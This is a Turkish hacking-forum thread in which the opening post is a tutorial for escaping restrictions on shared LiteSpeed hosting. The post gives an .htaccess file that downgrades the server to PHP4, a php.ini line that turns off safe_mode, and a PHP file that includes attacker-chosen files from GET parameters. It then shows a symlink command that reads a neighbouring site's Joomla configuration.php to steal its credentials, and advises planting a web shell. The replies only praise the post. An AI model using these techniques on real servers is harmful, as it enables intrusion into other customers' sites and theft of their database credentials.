Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: LiteSpeed server bypass komutları
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
LiteSpeed server bypass komutları
16.02.2014 10:29
.htaccess

Kod:
<Files *.php>
ForceType application/x-httpd-php4
</Files>

----------------------------------------------------

php.ini

Kod:
safe_mode = OFF

----------------------------------------------------

ini.php

Kod:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

-------------------------------------

Bu Dosyaları serverde açtığımız dizine upload ediyoruz örneğin ben Pose diye bir dizin açtım
oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin


/home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta

/home/bk:/usr/local/cpanel/bin/noshell
/home/bk2:/usr/local/cpanel/bin/noshell
/home/bk3:/usr/local/cpanel/bin/noshell
/home/bk4:/usr/local/cpanel/bin/noshell
/home/bk5:/usr/local/cpanel/bin/noshell
/home/bk6:/usr/local/cpanel/bin/noshell

hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden

/home/bk/public_html/

bir başka dizin olan /home/bk:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi


eğer joomla ise

ln -s //home/bk/public_html/configration.php pose.shtml

diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz bunu ctrl+u yaparak görebiliriz

NOT:Sunucu php4'e düşürülürken shell'i kaybedebilirsiniz bu yüzden her ihtimale karşı anadizine bir shell upload edin sıkıntı olmasın


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,050 / 1,050
Deneyim: 3 / 100
Rep Sayısı: 1042
Mesaj Sayısı: 2999
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: LiteSpeed server bypass komutları
16.02.2014 14:08
Eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı: 9
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #3
RE: LiteSpeed server bypass komutları
16.02.2014 14:12
güzel konu Smile
Alinti
[email protected]
avatar
Kondom Mağduru
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 272 / 633
Deneyim: 33 / 100
Rep Sayısı: 123
Mesaj Sayısı: 865
Üyelik Tarihi: 05.05.2013
     
Yorum: #4
Cvp: LiteSpeed server bypass komutları
16.02.2014 15:37
LİteSpeed en sevdiğimdir Smile
Alinti



1 Ziyaretçi